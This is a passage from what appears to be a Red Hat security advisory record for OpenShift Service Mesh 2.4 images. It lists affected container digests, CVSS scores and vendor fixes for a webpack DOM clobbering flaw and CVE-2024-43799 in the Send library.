"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", 